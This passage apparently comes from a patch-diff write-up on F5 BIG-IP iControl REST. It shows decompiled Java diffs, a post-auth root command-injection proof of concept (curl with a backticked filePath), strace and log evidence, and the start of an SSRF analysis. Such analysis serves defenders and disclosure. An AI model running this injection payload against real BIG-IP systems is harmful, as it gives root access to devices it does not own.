b/com/f5/rest/workers/asm/utils/ValidationResponse.java\n 
@@ -0,0 +1,26 @@\n +package com.f5.rest.workers.asm.utils;\n +\n +\n +\n +public class ValidationResponse\n +{\n + private boolean isValid;\n + private String message;\n +\n + public ValidationResponse(boolean paramBoolean) {\n + this.isValid = paramBoolean;\n + }\n +\n + public ValidationResponse(boolean paramBoolean, String paramString) {\n + this.isValid = paramBoolean;\n + this.message = paramString;\n + }\n +\n + public String getMessage() {\n + return this.message;\n + }\n +\n + public boolean isValid() {\n + return this.isValid;\n + }\n +}\n diff --git a/com/f5/rest/workers/authn/AuthnWorker.java b/com/f5/rest/workers/authn/AuthnWorker.java\n index 0658099..ddbe4cf 100644\n --- a/com/f5/rest/workers/authn/AuthnWorker.java\n +++ b/com/f5/rest/workers/authn/AuthnWorker.java\n 
@@ -1,555 +1,587 @@\n package com.f5.rest.workers.authn;\n \n import com.f5.rest.common.RestErrorResponse;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestReference;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestRequestSender;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorker;\n import com.f5.rest.common.UrlHelper;\n +import com.f5.rest.common.Utilities;\n import com.f5.rest.common.WellKnownPorts;\n import com.f5.rest.workers.AuthTokenItemState;\n import com.f5.rest.workers.RestResolverGroupEntry;\n import com.f5.rest.workers.authn.providers.AuthProviderCollectionState;\n import com.f5.rest.workers.authn.providers.AuthProviderLoginState;\n import com.f5.rest.workers.authn.providers.AuthProviderState;\n import com.f5.rest.workers.authn.providers.local.LocalAuthLoginWorker;\n import com.f5.rest.workers.authz.AuthSourceState;\n import com.f5.rest.workers.authz.AuthzHelper;\n import java.net.URI;\n import java.util.Collections;\n import java.util.HashMap;\n import java.util.Map;\n import java.util.concurrent.Callable;\n import java.util.concurrent.CancellationException;\n import java.util.concurrent.ExecutorService;\n import java.util.concurrent.Executors;\n import java.util.concurrent.Future;\n import java.util.concurrent.TimeUnit;\n import java.util.concurrent.TimeoutException;\n import java.util.concurrent.atomic.AtomicInteger;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n -\n public class AuthnWorker\n extends RestWorker\n {\n public static final String LOGIN_PATH_SUFFIX = \"login\";\n public static final String WORKER_URI_PATH = UrlHelper.buildUriPath(new String[] { \"shared/\", \"authn\", \"login\" });\n \n public static final String MAX_NUMBER_LOGIN_FAILURE_MSG = \"Maximum number of login attempts exceeded.\";\n \n public static final String LOGIN_ERROR_MSG = \"Unable to login using supplied information. 
If you are attempting to login with a configured authentication provider it may be unavailable or no longer exist.\";\n \n public static final int MAX_NUMBER_LOGIN_FAILURES = 5;\n private static final long FAILED_ATTEMPTS_TIMEOUT = TimeUnit.MINUTES.toMicros(5L);\n \n private static final int GET_AUTHSOURCE_MAX_WAIT_MILLIS = 800;\n private static final int GET_AUTHSOURCE_BASE_WAIT_MILLIS = 10;\n private static final int GET_AUTHSOURCE_EXPONENT_FACTOR = 2;\n private static final int GET_AUTHSOURCE_EXPONENTIAL_ATTEMPTS = 5;\n private static final int GET_AUTHSOURCE_LINEAR_FACTOR = 50;\n private final int LOOKUP_AUTH_MAX_WAIT_MILLIS = (int)TimeUnit.SECONDS.toMillis(10L);\n private final int LOOKUP_AUTH_MAX_RETRIES = 10;\n private final Map<URI, AtomicInteger> lookupAuthRetryCountReferenceMap = Collections.synchronizedMap(new HashMap<>());\n \n private class LoginFailures\n {\n public int failures = 0;\n private LoginFailures() {}\n \n public long lastFailureMicros; }\n private final Map<String, RestReference> loginNameToReferenceMap = Collections.synchronizedMap(new HashMap<>());\n \n private final Map<String, LoginFailures> loginFailureMap = Collections.synchronizedMap(new HashMap<>());\n \n \n private final Map<URI, URI> subscriptions = Collections.synchronizedMap(new HashMap<>());\n \n \n \n \n public void onStart(RestServer server) throws Exception {\n setSynchronized(true);\n \n setMaxPendingOperations(10000L);\n setPersisted(false);\n setReplicated(false);\n setIndexed(false);\n setPublic(true);\n \n \n completeStart(null, new URI[] { UrlHelper.buildLocalUriSafe(server, new String[] { LocalAuthLoginWorker.WORKER_URI_PATH }), UrlHelper.buildLocalUriSafe(server, new String[] { \"shared/resolver/groups\" }) });\n }\n \n \n \n \n \n \n \n \n protected void onStartCompleted(Object state, Exception stateLoadEx, Exception availabilityEx) throws Exception {\n subscribeToAuthProviderGroup();\n \n +\n +\n + 
this.subscriptions.put(makePublicUri(LocalAuthLoginWorker.WORKER_URI_PATH), makePublicUri(LocalAuthLoginWorker.WORKER_URI_PATH));\n +\n +\n super.onStartCompleted(state, stateLoadEx, availabilityEx);\n }\n \n private void subscribeToAuthProviderGroup() throws Exception {\n RestRequestCompletion subscribeCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n AuthnWorker.this.getLogger().warningFmt(\"Failed to subscribe to auth providers: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.getLogger().fine(\"Successfully subscribed to auth providers\");\n \n AuthzHelper.getAllAuthProviders(AuthnWorker.this.getServer(), new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation operation)\n {\n AuthnWorker.this.getLogger().warningFmt(\"Failed to get all auth providers: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.processAuthProviderGroupNotification(operation);\n }\n });\n }\n };\n \n \n RestRequestCompletion notificationCompletion = new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation operation)\n {\n AuthnWorker.this.getLogger().severeFmt(\"Notification from auth providers failed: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.processAuthProviderGroupNotification(operation);\n }\n };\n \n AuthzHelper.subscribeToAuthProviderGroup(getServer(), subscribeCompletion, notificationCompletion);\n }\n \n \n \n \n \n private void processAuthProviderGroupNotification(RestOperation operation) {\n RestResolverGroupEntry entry = (RestResolverGroupEntry)operation.getTypedBody(RestResolverGroupEntry.class);\n \n \n if (entry.references != null) {\n for (RestReference ref : 
entry.references) {\n if (operation.getMethod().equals(RestOperation.RestMethod.DELETE)) {\n unsubscribe(ref.link); continue;\n }\n subscribeToAuthProvider(ref.link);\n }\n }\n }\n \n \n \n private void lookupAuthProviderCollection(URI authProviderLink) {\n this.lookupAuthRetryCountReferenceMap.put(authProviderLink, new AtomicInteger(0));\n lookupAuthProviderCollectionRetry(authProviderLink);\n }\n \n \n private void lookupAuthProviderCollectionRetry(final URI authProviderLink) {\n RestRequestCompletion completion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n if (((AtomicInteger)AuthnWorker.this.lookupAuthRetryCountReferenceMap.get(authProviderLink)).intValue() > 10) {\n AuthnWorker.this.getLogger().severeFmt(\"Max retries; failed to lookup auth provider %s: %s\", new Object[] { this.val$authProviderLink.toString(), RestHelper.throwableStackToString(ex) });\n \n return;\n }\n \n AuthnWorker.this.getLogger().warningFmt(\"Failed to lookup auth provider %s: Retry number %s\", new Object[] { this.val$authProviderLink.toString(), Integer.valueOf(((AtomicInteger)AuthnWorker.access$100(this.this$0).get(this.val$authProviderLink)).intValue()) });\n \n \n AuthnWorker.this.scheduleTaskOnce(new Runnable()\n {\n public void run() {\n ((AtomicInteger)AuthnWorker.this.lookupAuthRetryCountReferenceMap.get(authProviderLink)).incrementAndGet();\n AuthnWorker.this.lookupAuthProviderCollectionRetry(authProviderLink);\n }\n }, AuthnWorker.this.LOOKUP_AUTH_MAX_WAIT_MILLIS);\n }\n \n \n public void completed(RestOperation operation) {\n AuthProviderCollectionState collectionState = (AuthProviderCollectionState)operation.getTypedBody(AuthProviderCollectionState.class);\n \n \n for (AuthProviderState item : collectionState.items) {\n AuthnWorker.this.addAuthProvider(item);\n }\n AuthnWorker.this.lookupAuthRetryCountReferenceMap.remove(authProviderLink);\n }\n };\n \n RestOperation op = 
RestOperation.create().setUri(makeLocalUri(authProviderLink)).setCompletion(completion);\n \n sendGet(op);\n }\n \n \n private void unsubscribe(URI providerCollectionLink) {\n URI notificationWorkerUri = this.subscriptions.get(providerCollectionLink);\n \n if (notificationWorkerUri == null) {\n return;\n }\n \n RestOperation subscribeRequest = RestOperation.create().setUri(makeLocalUri(providerCollectionLink));\n \n try {\n sendDeleteForSubscription(subscribeRequest, notificationWorkerUri);\n } catch (Exception e) {\n getLogger().fineFmt(\"Failed to unsubscribe to %s: %s\", new Object[] { providerCollectionLink.getPath(), RestHelper.throwableStackToString(e) });\n }\n }\n \n \n private void subscribeToAuthProvider(final URI providerCollectionLink) {\n RestRequestCompletion notificationCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation)\n {\n AuthProviderState state = (AuthProviderState)operation.getTypedBody(AuthProviderState.class);\n \n if (operation.getMethod().equals(RestOperation.RestMethod.DELETE)) {\n AuthnWorker.this.removeAuthProvider(state);\n } else {\n AuthnWorker.this.addAuthProvider(state);\n }\n }\n \n \n \n public void failed(Exception ex, RestOperation operation) {\n AuthnWorker.this.getLogger().severeFmt(\"%s\", new Object[] { ex.getMessage() });\n }\n };\n \n \n RestRequestCompletion subscribeCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n AuthnWorker.this.getLogger().severeFmt(\"Failed to subscribe to auth provider %s: %s\", new Object[] { this.val$providerCollectionLink.getPath(), RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.getLogger().fine(\"Successfully subscribed to auth provider.\");\n AuthnWorker.this.lookupAuthProviderCollection(providerCollectionLink);\n }\n };\n \n \n RestOperation subscribeRequest = 
RestOperation.create().setUri(makeLocalUri(providerCollectionLink)).setCompletion(subscribeCompletion);\n \n try {\n URI notificationUri = sendPostForSubscription(subscribeRequest, getServer(), notificationCompletion);\n \n this.subscriptions.put(providerCollectionLink, notificationUri);\n } catch (Exception e) {\n getLogger().severeFmt(\"Error while subscribing to %s: %s\", new Object[] { providerCollectionLink.getPath(), RestHelper.throwableStackToString(e) });\n }\n }\n \n \n \n \n private void addAuthProvider(AuthProviderState state) {\n getLogger().fineFmt(\"Added a new auth provider [%s] at [%s].\", new Object[] { state.name, state.loginReference.link });\n \n this.loginNameToReferenceMap.put(state.name, state.loginReference);\n }\n \n private void removeAuthProvider(AuthProviderState state) {\n getLogger().fineFmt(\"Removed an auth provider %s.\", new Object[] { state.name });\n this.loginNameToReferenceMap.remove(state.name);\n }\n \n \n protected void onPost(final RestOperation request) {\n final String incomingAddress = request.getRemoteSender();\n \n final AuthnWorkerState state = (AuthnWorkerState)request.getTypedBody(AuthnWorkerState.class);\n AuthProviderLoginState loginState = (AuthProviderLoginState)request.getTypedBody(AuthProviderLoginState.class);\n \n \n - if (state.password == null && state.bigipAuthCookie == null) {\n + if (Utilities.isNullOrEmpty(state.password) && Utilities.isNullOrEmpty(state.bigipAuthCookie)) {\n state.bigipAuthCookie = request.getCookie(\"BIGIPAuthCookie\");\n loginState.bigipAuthCookie = state.bigipAuthCookie;\n }\n \n if (incomingAddress != null && incomingAddress != \"Unknown\") {\n loginState.address = incomingAddress;\n }\n \n - if ((state.username == null || state.password == null) && state.bigipAuthCookie == null) {\n + if ((Utilities.isNullOrEmpty(state.username) || Utilities.isNullOrEmpty(state.password)) && Utilities.isNullOrEmpty(state.bigipAuthCookie)) {\n +\n request.setStatusCode(401);\n String msg = 
String.format(\"username and password must not be null or %s in Cookie header should be used.\", new Object[] { \"BIGIPAuthCookie\" });\n \n request.fail(new SecurityException(msg));\n \n +\n return;\n }\n \n + boolean isAllowedLinks = false;\n +\n +\n +\n +\n +\n +\n +\n + if (state.loginReference != null && state.loginReference.link != null) {\n +\n + for (URI iter : this.subscriptions.keySet()) {\n + if (state.loginReference.link.getPath().equals(iter.getPath())) {\n + isAllowedLinks = true;\n + break;\n + }\n + }\n + if (!isAllowedLinks) {\n + getLogger().severe(\"No login provider found.\");\n + String msg = String.format(\"No login provider found.\", new Object[0]);\n + request.fail(new SecurityException(msg));\n +\n + return;\n + }\n + }\n +\n state.password = null;\n request.setBody(state);\n \n \n \n if (state.loginReference == null) {\n if (state.loginProviderName == null) {\n ExecutorService executorService = Executors.newSingleThreadExecutor();\n Callable<String> callable = new Callable<String>()\n {\n public String call() throws Exception {\n final String[] providerName = { null };\n RestRequestCompletion getAuthSourceTypeCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation response) {\n AuthSourceState sourceState = (AuthSourceState)response.getTypedBody(AuthSourceState.class);\n if (\"local\".equals(sourceState.type)) {\n providerName[0] = \"local\";\n } else {\n providerName[0] = \"tmos\";\n }\n }\n \n \n public void failed(Exception ex, RestOperation response) {\n request.fail(ex);\n }\n };\n \n AuthzHelper.getAuthSource(AuthnWorker.this.getServer(), getAuthSourceTypeCompletion);\n try {\n int remainingSleepTime = 800, numberOfAttempts = 0;\n int multiplier = 1; numberOfAttempts = 1;\n for (; providerName[0] == null;\n multiplier *= 2, numberOfAttempts++) {\n \n TimeUnit.MILLISECONDS.sleep((10 * multiplier));\n remainingSleepTime -= 10 * multiplier;\n if (providerName[0] != null || numberOfAttempts == 5) {\n break;\n 
}\n }\n \n while (providerName[0] == null) {\n TimeUnit.MILLISECONDS.sleep(50L);\n remainingSleepTime -= 50;\n }\n AuthnWorker.this.getLogger().fine(\"Total Time taken to set the loginProviderName is \" + (800 - remainingSleepTime) + \"ms\");\n } catch (InterruptedException e) {\n AuthnWorker.this.getLogger().severe(\"Error while setting value to loginProviderName when no loginReference and no loginProviderName were given\");\n }\n return providerName[0];\n }\n };\n \n Future<String> future = executorService.submit(callable);\n try {\n state.loginProviderName = future.get(800L, TimeUnit.MILLISECONDS);\n executorService.shutdown();\n } catch (TimeoutException e) {\n getLogger().severe(\"Maximum wait time(800ms) exceeded while getting value of loginProviderName\");\n future.cancel(true);\n if (!executorService.isShutdown()) {\n executorService.shutdown();\n }\n } catch (CancellationException|java.util.concurrent.ExecutionException|InterruptedException e) {\n getLogger().severe(\"Error while getting value of loginProviderName:\" + RestHelper.throwableStackToString(e));\n if (!executorService.isShutdown()) {\n executorService.shutdown();\n }\n }\n getLogger().fineFmt(\"loginProviderName set to %s as default value, based on authentication source type when it was null\", new Object[] { state.loginProviderName });\n }\n \n if (state.loginProviderName != null) {\n if (state.loginProviderName.equals(\"local\")) {\n state.loginReference = new RestReference(makePublicUri(LocalAuthLoginWorker.WORKER_URI_PATH));\n }\n else if (this.loginNameToReferenceMap.containsKey(state.loginProviderName)) {\n state.loginReference = this.loginNameToReferenceMap.get(state.loginProviderName);\n } else {\n request.fail(new IllegalArgumentException(\"loginProviderName is invalid.\"));\n return;\n }\n } else {\n request.fail(new IllegalArgumentException(\"loginProviderName is null.\"));\n \n \n return;\n }\n }\n \n final String failureKey = String.format(\"%s:%s\", new Object[] { (state.username 
== null) ? state.bigipAuthCookie : state.username, state.loginReference.link });\n \n \n \n LoginFailures failures = this.loginFailureMap.get(failureKey);\n \n if (failures != null && failures.failures >= 5) {\n if (RestHelper.getNowMicrosUtc() - failures.lastFailureMicros < FAILED_ATTEMPTS_TIMEOUT) {\n request.setStatusCode(401);\n request.fail(new SecurityException(\"Maximum number of login attempts exceeded.\"));\n return;\n }\n this.loginFailureMap.remove(failureKey);\n }\n \n \n RestRequestCompletion authCompletion = new RestRequestCompletion()\n {\n \n public void failed(Exception ex, RestOperation operation)\n {\n String loginProviderId = (state.loginProviderName == null) ? state.loginReference.link.toString() : state.loginProviderName;\n \n \n String clientId = (state.username == null) ? (\"Cookie \" + state.bigipAuthCookie) : (\"User \" + state.username);\n \n AuthnWorker.this.getLogger().infoFmt(\"%s failed to login from %s using the %s authentication provider\", new Object[] { clientId, this.val$incomingAddress, loginProviderId });\n \n \n AuthnWorker.LoginFailures failures = (AuthnWorker.LoginFailures)AuthnWorker.this.loginFailureMap.get(failureKey);\n if (failures == null) {\n failures = new AuthnWorker.LoginFailures();\n AuthnWorker.this.loginFailureMap.put(failureKey, failures);\n }\n failures.lastFailureMicros = RestHelper.getNowMicrosUtc();\n failures.failures++;\n \n request.setStatusCode(401);\n \n if (ex.getMessage() == null || ex.getMessage().isEmpty()) {\n request.fail(ex, RestErrorResponse.create().setMessage(\"Unable to login using supplied information. 
If you are attempting to login with a configured authentication provider it may be unavailable or no longer exist.\"));\n return;\n }\n request.fail(ex);\n }\n \n \n \n \n \n public void completed(RestOperation operation) {\n AuthnWorker.this.loginFailureMap.remove(failureKey);\n \n AuthProviderLoginState loggedIn = (AuthProviderLoginState)operation.getTypedBody(AuthProviderLoginState.class);\n \n \n String authProviderId = loggedIn.authProviderName;\n if (authProviderId == null) {\n authProviderId = (state.loginProviderName == null) ? state.loginReference.link.toString() : state.loginProviderName;\n }\n \n \n AuthnWorker.this.getLogger().finestFmt(\"User %s successfully logged in from %s using the %s authentication provider.\", new Object[] { loggedIn.username, this.val$incomingAddress, authProviderId });\n \n \n \n \n AuthnWorker.generateToken(AuthnWorker.this.getServer(), request, state, loggedIn);\n }\n };\n \n RestOperation checkAuth = RestOperation.create().setBody(loginState).setUri(makeLocalUri(state.loginReference.link)).setCompletion(authCompletion);\n \n \n sendPost(checkAuth);\n }\n \n \n \n \n \n \n \n public static void generateToken(RestServer server, final RestOperation request, final AuthnWorkerState authState, AuthProviderLoginState loginState) {\n if (authState.needsToken != null && !authState.needsToken.booleanValue()) {\n request.setBody(authState);\n request.complete();\n \n return;\n }\n AuthTokenItemState token = new AuthTokenItemState();\n token.userName = loginState.username;\n token.user = loginState.userReference;\n token.groupReferences = loginState.groupReferences;\n token.authProviderName = loginState.authProviderName;\n token.address = request.getXForwarderdFor();\n \n RestRequestCompletion tokenCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n request.fail(ex);\n }\n \n \n \n public void completed(RestOperation operation) {\n AuthTokenItemState token = 
(AuthTokenItemState)operation.getTypedBody(AuthTokenItemState.class);\n authState.token = token;\n request.setBody(authState);\n request.complete();\n }\n };\n \n \n RestOperation createToken = RestOperation.create().setUri(UrlHelper.buildLocalUriSafe(server, new String[] { WellKnownPorts.AUTHZ_TOKEN_WORKER_URI_PATH })).setBody(token).setCompletion(tokenCompletion).setReferer(\"authn-generate-token\");\n \n \n \n \n \n RestRequestSender.sendPost(createToken);\n }\n }\n diff --git a/com/f5/rest/workers/liveupdate/LiveUpdateDownloadWorker.java b/com/f5/rest/workers/liveupdate/LiveUpdateDownloadWorker.java\n index 5e33f0d..caba75d 100644\n --- a/com/f5/rest/workers/liveupdate/LiveUpdateDownloadWorker.java\n +++ b/com/f5/rest/workers/liveupdate/LiveUpdateDownloadWorker.java\n @@ -1,17 +1,18 @@\n package com.f5.rest.workers.liveupdate;\n \n import com.f5.rest.common.RestWorker;\n -import com.f5.rest.workers.FileTransferWorker;\n +import com.f5.rest.workers.FileTransferPrivateWorker;\n \n -public class LiveUpdateDownloadWorker extends LiveUpdateFileTransferWorker {\n +public class LiveUpdateDownloadWorker\n + extends LiveUpdateFileTransferWorker {\n private String getDirectory;\n \n public LiveUpdateDownloadWorker(String paramString1, String paramString2) {\n super(paramString1);\n this.getDirectory = paramString2;\n }\n \n protected RestWorker getRestWorker() throws Exception {\n - return (RestWorker)new FileTransferWorker(this.getDirectory);\n + return (RestWorker)new FileTransferPrivateWorker(this.getDirectory);\n }\n }\n diff --git a/com/f5/rest/workers/liveupdate/LiveUpdateUploadWorker.java b/com/f5/rest/workers/liveupdate/LiveUpdateUploadWorker.java\n index 03cddd7..d46ac00 100644\n --- a/com/f5/rest/workers/liveupdate/LiveUpdateUploadWorker.java\n +++ b/com/f5/rest/workers/liveupdate/LiveUpdateUploadWorker.java\n 
@@ -1,59 +1,60 @@\n package com.f5.rest.workers.liveupdate;\n \n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestWorker;\n -import com.f5.rest.workers.FileTransferWorker;\n +import com.f5.rest.workers.FileTransferPrivateWorker;\n import java.io.File;\n import java.nio.file.Files;\n import java.nio.file.LinkOption;\n import java.nio.file.Path;\n import java.nio.file.Paths;\n import java.nio.file.attribute.GroupPrincipal;\n import java.nio.file.attribute.PosixFileAttributeView;\n import java.nio.file.attribute.PosixFileAttributes;\n import java.nio.file.attribute.UserPrincipal;\n import java.util.List;\n \n public class LiveUpdateUploadWorker\n - extends LiveUpdateFileTransferWorker {\n + extends LiveUpdateFileTransferWorker\n +{\n private String postDirectory;\n private String tmpDirectory;\n \n public LiveUpdateUploadWorker(String paramString1, String paramString2, String paramString3) {\n super(paramString1);\n this.postDirectory = paramString2;\n this.tmpDirectory = paramString3;\n }\n \n protected void onRequestComplete(RestOperation paramRestOperation) {\n List list = paramRestOperation.getParsedCollectionEntries();\n if (list != null && !list.isEmpty()) {\n String str = \"/var/lib/hsqldb/live-update/update-files/\" + ((RestOperation.ParsedCollectionEntry)list.get(0)).entryKey;\n File file = new File(str);\n if (file.exists()) {\n \n try {\n File file1 = new File(\"/var/lib/hsqldb/live-update/update-files\");\n PosixFileAttributes posixFileAttributes = Files.<PosixFileAttributes>readAttributes(file1.toPath(), PosixFileAttributes.class, new LinkOption[] { LinkOption.NOFOLLOW_LINKS });\n GroupPrincipal groupPrincipal = posixFileAttributes.group();\n UserPrincipal userPrincipal = posixFileAttributes.owner();\n \n PosixFileAttributeView posixFileAttributeView = Files.<PosixFileAttributeView>getFileAttributeView(file.toPath(), PosixFileAttributeView.class, new LinkOption[] { LinkOption.NOFOLLOW_LINKS });\n 
posixFileAttributeView.setGroup(groupPrincipal);\n \n Path path = Paths.get(str, new String[0]);\n Files.setOwner(path, userPrincipal);\n \n file.setReadable(true, false);\n } catch (Exception exception) {}\n }\n }\n }\n \n \n protected RestWorker getRestWorker() throws Exception {\n - FileTransferWorker fileTransferWorker = new FileTransferWorker(this.postDirectory, this.tmpDirectory);\n - fileTransferWorker.setPostFileGrooming(false);\n - return (RestWorker)fileTransferWorker;\n + FileTransferPrivateWorker fileTransferPrivateWorker = new FileTransferPrivateWorker(this.postDirectory, this.tmpDirectory);\n + fileTransferPrivateWorker.setPostFileGrooming(false);\n + return (RestWorker)fileTransferPrivateWorker;\n }\n }\n \n\n## RCE\n\nThis is a post-auth root command injection in a `tar(1)` command.\n\n### Patch\n\nFiltering is applied to the user-controlled `taskState.filePath` parameter.\n \n \n [snip]\n + private static final Pattern validFilePathChars = Pattern.compile(\"(^[a-zA-Z][a-zA-Z0-9_.\\\\-\\\\s()]*)\\\\.([tT][aA][rR]\\\\.[gG][zZ])$\");\n [snip]\n private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {\n if (Utilities.isNullOrEmpty(taskState.filePath)) {\n File agcUseCasePackDir = new File(\"/var/apm/f5-iappslx-agc-usecase-pack/\");\n if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {\n String error = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n failTask(taskState, error, \"\");\n return;\n }\n File[] agcUseCasePack = agcUseCasePackDir.listFiles();\n if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {\n \n String error = \"Access Guided Configuration use case pack not found on BIG-IP. 
Please upload and install the pack.\";\n failTask(taskState, error, \"\");\n return;\n }\n taskState.filePath = agcUseCasePack[0].getPath();\n }\n \n + String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);\n + Matcher m = validFilePathChars.matcher(filename);\n + if (!m.matches()) {\n + String errorMessage = String.format(\"Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed\", new Object[] { filename });\n +\n +\n +\n + failTask(taskState, errorMessage, \"\");\n +\n + return;\n + }\n final String extractTarCommand = \"tar -xf \" + taskState.filePath + \" -O > /dev/null\";\n \n \n ShellExecutor extractTar = new ShellExecutor(extractTarCommand);\n \n CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>()\n {\n public void completed(ShellExecutionResult extractQueryResult)\n {\n if (extractQueryResult.getExitStatus().intValue() != 0) {\n String error = extractTarCommand + \" failed with exit code=\" + extractQueryResult.getExitStatus();\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.\", error + \"stdout + stderr=\" + extractQueryResult.getOutput());\n \n \n return;\n }\n \n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception ex, ShellExecutionResult rpmQueryResult) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Usecase pack validation failed. 
Please ensure that usecase pack is a valid tar archive.\", String.format(\"%s failed\", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex));\n }\n };\n \n \n \n extractTar.startExecution(executionFinishedHandler);\n }\n [snip]\n \n\n### PoC\n\nThe affected endpoint is `/mgmt/tm/access/bundle-install-tasks`.\n \n \n wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{\"filePath\":\"`id`\"}' | jq .\n {\n \"filePath\": \"`id`\",\n \"toBeInstalledAppRpmsIndex\": -1,\n \"id\": \"36671f83-d1be-4f5a-a2e6-7f9442a2a76f\",\n \"status\": \"CREATED\",\n \"userReference\": {\n \"link\": \"https://localhost/mgmt/shared/authz/users/admin\"\n },\n \"identityReferences\": [\n {\n \"link\": \"https://localhost/mgmt/shared/authz/users/admin\"\n }\n ],\n \"ownerMachineId\": \"ac2562f0-e41f-4652-ba35-6a2b804b235e\",\n \"generation\": 1,\n \"lastUpdateMicros\": 1615930477819656,\n \"kind\": \"tm:access:bundle-install-tasks:iappbundleinstalltaskstate\",\n \"selfLink\": \"https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f\"\n }\n wvu@kharak:~$\n \n\nThe `id(1)` command is executed as root.\n \n \n [pid 64748] execve(\"/bin/tar\", [\"tar\", \"-xf\", \"uid=0(root)\", \"gid=0(root)\", \"groups=0(root)\", \"context=system_u:system_r:initrc_t:s0\", \"-O\"], [/* 9 vars */]) = 0\n \n\n### IOCs\n\nAn error may be seen in `/var/log/restjavad.0.log`. This log file is rotated.\n \n \n [SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive. 
error details: tar -xf `id` -O > /dev/null failedorg.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)\n \tat org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)\n \tat org.apache.commons.exec.DefaultExecutor.access$200(DefaultExecutor.java:48)\n \tat org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:200)\n \tat java.lang.Thread.run(Thread.java:748)\n \n\n## SSRF?\n\nApache on port 443 talks to `restjavad` on port 8100, which spawns and talks to `/usr/bin/icrd_child` on an ephemeral port.\n\n### Patch\n\nValidation is applied to the user-controlled `state.loginReference.link` parameter.\n \n \n [snip]\n protected void onPost(final RestOperation request) {\n final String incomingAddress = request.getRemoteSender();\n \n final AuthnWorkerState state = (AuthnWorkerState)request.getTypedBody(AuthnWorkerState.class);\n AuthProviderLoginState loginState = (AuthProviderLoginState)request.getTypedBody(AuthProviderLoginState.class);\n \n \n - if (state.password == null && state.bigipAuthCookie == null) {\n + if (Utilities.isNullOrEmpty(state.password) && Utilities.isNullOrEmpty(state.bigipAuthCookie)) {\n state.bigipAuthCookie = request.getCookie(\"BIGIPAuthCookie\");\n loginState.bigipAuthCookie = state.bigipAuthCookie;\n }\n \n if (incomingAddress != null && incomingAddress != \"Unknown\") {\n loginState.address = incomingAddress;\n }\n \n - if ((state.username == null || state.password == null) && state.bigipAuthCookie == null) {\n + if ((Utilities.isNullOrEmpty(state.username) || Utilities.isNullOrEmpty(state.password)) && Utilities.isNullOrEmpty(state.bigipAuthCookie)) {\n +\n request.setStatusCode(401);\n String msg = String.format(\"username and password must not be null or %s in Cookie header should be used.\", new Object[] { \"BIGIPAuthCookie\" });\n \n request.fail(new SecurityException(msg));\n \n +\n return;\n }\n \n + boolean isAllowedLinks = false;\n +\n +\n +\n +\n +\n +\n +\n 
+ if (state.loginReference != null && state.loginReference.link != null) {\n +\n + for (URI iter : this.subscriptions.keySet()) {\n + if (state.loginReference.link.getPath().equals(iter.getPath())) {\n + isAllowedLinks = true;\n + break;\n + }\n + }\n + if (!isAllowedLinks) {\n + getLogger().severe(\"No login provider found.\");\n + String msg = String.format(\"No login provider found.\", new Object[0]);\n + request.fail(new SecurityException(msg));\n +\n + return;\n + }\n + }\n +\n state.password = null;\n request.setBody(state);\n \n \n \n if (state.loginReference == null) {\n if (state.loginProviderName == null) {\n ExecutorService executorService = Executors.newSingleThreadExecutor();\n Callable<String> callable = new Callable<String>()\n {\n public String call() throws Exception {\n final String[] providerName = { null };\n RestRequestCompletion getAuthSourceTypeCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation response) {\n AuthSourceState sourceState = (AuthSourceState)response.getTypedBody(AuthSourceState.class);\n if (\"local\".equals(sourceState.type)) {\n providerName[0] = \"local\";\n } else {\n providerName[0] = \"tmos\";\n }\n }\n \n \n public void failed(Exception ex, RestOperation response) {\n request.fail(ex);\n }\n };\n \n 